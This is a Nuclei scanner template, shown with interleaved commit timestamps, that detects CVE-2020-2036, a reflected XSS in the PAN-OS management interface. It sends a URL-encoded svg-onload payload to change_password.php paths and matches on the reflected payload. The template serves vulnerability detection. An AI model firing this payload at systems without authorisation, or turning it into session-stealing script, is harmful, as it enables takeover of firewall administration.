nuclei-templates/cves/2020/CVE-2020-2036.yaml

41 lines
1.4 KiB
YAML
Raw Normal View History

2021-02-14 20:00:21 +00:00
id: CVE-2020-2036
2021-02-14 20:00:21 +00:00
info:
2021-02-15 19:05:52 +00:00
name: Palo Alto Networks Reflected XSS
2021-02-14 20:00:21 +00:00
author: madrobot
severity: high
description: |
2021-03-10 11:22:37 +00:00
A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
reference:
- https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
- https://security.paloaltonetworks.com/CVE-2020-2036
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-2036
cwe-id: CWE-79
tags: cve,cve2020,vpn,xss
2021-02-15 19:05:52 +00:00
2021-02-14 20:00:21 +00:00
requests:
- method: GET
path:
2021-02-14 20:01:58 +00:00
- "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
- "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
2021-10-02 12:26:42 +00:00
2021-10-02 06:24:29 +00:00
stop-at-first-match: true
2021-02-14 20:00:21 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-02-15 19:05:52 +00:00
2021-02-14 20:00:21 +00:00
- type: word
words:
- "<svg/onload=alert(1)>"
part: body
2021-02-15 19:05:52 +00:00
- type: word
words:
- "text/html"
2021-10-02 06:24:29 +00:00
part: header